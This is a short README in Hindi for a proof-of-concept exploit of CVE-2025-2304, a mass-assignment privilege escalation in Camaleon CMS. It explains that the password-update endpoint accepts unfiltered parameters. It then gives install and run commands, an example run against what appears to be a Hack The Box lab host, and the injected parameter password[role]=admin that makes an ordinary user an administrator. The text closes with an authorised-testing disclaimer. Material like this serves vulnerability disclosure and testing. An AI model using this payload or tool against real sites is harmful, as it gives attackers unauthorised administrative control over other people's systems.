
कैमेलियन सीएमएस में CVE-2025-2304 विशेषाधिकार वृद्धि के लिए PoC
Camaleon CMS मास असाइनमेंट के माध्यम से विशेषाधिकार वृद्धि (Privilege Escalation) के प्रति संवेदनशील है
Camaleon CMS में मास असाइनमेंट के माध्यम से विशेषाधिकार वृद्धि (Privilege Escalation) मौजूद है
जब कोई उपयोगकर्ता अपना पासवर्ड बदलना चाहता है, तो UsersController की 'updated_ajax' विधि को कॉल किया जाता है। यह भेद्यता खतरनाक permit! विधि के उपयोग के कारण उत्पन्न होती है, जो बिना किसी फ़िल्टरिंग के सभी पैरामीटरों को पारित होने देती है।
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - संवेदनशील एप्लिकेशन का आधार URL-u - प्रमाणीकरण के लिए उपयोगकर्ता नाम-p - प्रमाणीकरण के लिए पासवर्डpython exploit.py --url http://facts.htb -u krrish -p krrish
आउटपुट:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=admin पैरामीटर के साथ पासवर्ड अद्यतन अनुरोध भेजता हैयह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।